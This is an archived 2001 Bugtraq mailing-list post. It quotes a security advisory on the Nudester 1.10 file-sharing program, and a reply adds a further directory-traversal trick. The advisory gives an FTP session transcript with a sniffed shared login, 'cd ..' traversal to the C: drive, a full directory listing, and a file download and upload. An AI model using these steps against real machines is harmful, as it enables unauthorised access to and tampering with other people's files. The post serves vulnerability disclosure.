you can gain full ftp access without a password. just log in to the person running nudester using any l/p and there you go. if you are using IE to browse files you cannot directly view other folders. the workaround is simple. ftp://127.0.0.0/../ will give you C:\ (the directory you start in is c:\temp). i do not think you can upload files using this method, but you can download and view folders/files. using an ftp prog such as the one that comes with windows will allow full access. dont know why that is. not many people use nudester (i found only 5 users when i did a search). ----- Original Message ----- From: "Gary" <Cyph3rat_private> To: <bugtraqat_private> Sent: Friday, August 17, 2001 2:34 AM Subject: [Real Security] Advisory for Nudester 1.10 > <-------------------------> > [Real Security Advisory #1] > [ Author: Cyph3r ] > [ www.Real-Security.org ] > [ Date: 08/16/2001 ] > <-------------------------> > [Vulnerable: ] > [Nudester 1.10(& below?)] > [ OS: Win9x/me/2k/nt/xp ] > [ Site: www.nudester.org ] > <-------------------------> > > -> Severity: Malicious users can gain full access to the users Files > (upload/download) > > -> Overview: Nudester, a file sharing program for porn uses the FTP protocol > to transfer files, > The problem is it gives access to the whole hard disk instead of just the > folder containing porn. > Example: > Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a > file from a user on Nudester > While having the sniffer running filtering port 21 inclusive so you can get > the password. > > <Sniffed Data> > > 220 ICS FTP Server ready > user NUDESTER > 331 Password required for NUDESTER > pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534 > 230 User NUDESTER logged in > > </Sniffed data> > > Open an ftp client and connect to the ip > > ftp> open ***.***.***.*** > Connected to ***.***.***.*** > 220 ICS FTP Server ready. > User (***.***.***.***:(none)): NUDESTER > 331 Password required for NUDESTER. > Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534 > 230 User NUDESTER logged in. > > - Bingo! > > ftp> dir > 200 Port command successful. > 150 Opening data connection for directory list. > C:\TEMP\*.* not found > 226 File sent ok > ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec. > ftp> cd .. > 250 CWD command successful. "C:/" is current directory. > ftp> DIR > 200 Port command successful. > 150 Opening data connection for directory list. > -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT > -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE > -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS > -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM > -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS > -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM > -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD > -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD > drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI > -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS > -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS > -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK > drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS > drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000 > -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT > -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK > -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT > -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT > dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files > -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS > -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG > -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt > -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini > drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt > -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE > -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE > -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE > -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ > -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC > -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC > -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC > drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS > -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001 > drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts > -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt > -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM > drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip > drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped > drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus > drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music > -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt > drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator > -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log > 226 File sent ok > ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec. > > - Lets see if we have access to download a file > > ftp> get netsig.txt > 200 Port command successful. > 150 Opening data connection for netsig.txt. > 226 File sent ok > ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec. > > - Yep, let's try to upload a file > > ftp> put c:\temp.txt > 200 Port command successful. > 150 Opening data connection for TEMP.TXT. > 226 File received ok > > -> Conclusion: anyone can gain full access to Nudester user's files; the > username is the same for every user > However the password is not the same, you will have to sniff while > downloading a file to retrieve the password, > The only solution to this problem is not to use Nudester. > > -> Credits: Cyph3r - Cyph3rat_private > > -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid, > spasms, trew, zeronine, matt, shizniz, z0mb1e > b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed. > > >
This archive was generated by hypermail 2b30 : Sun Aug 19 2001 - 19:04:48 PDT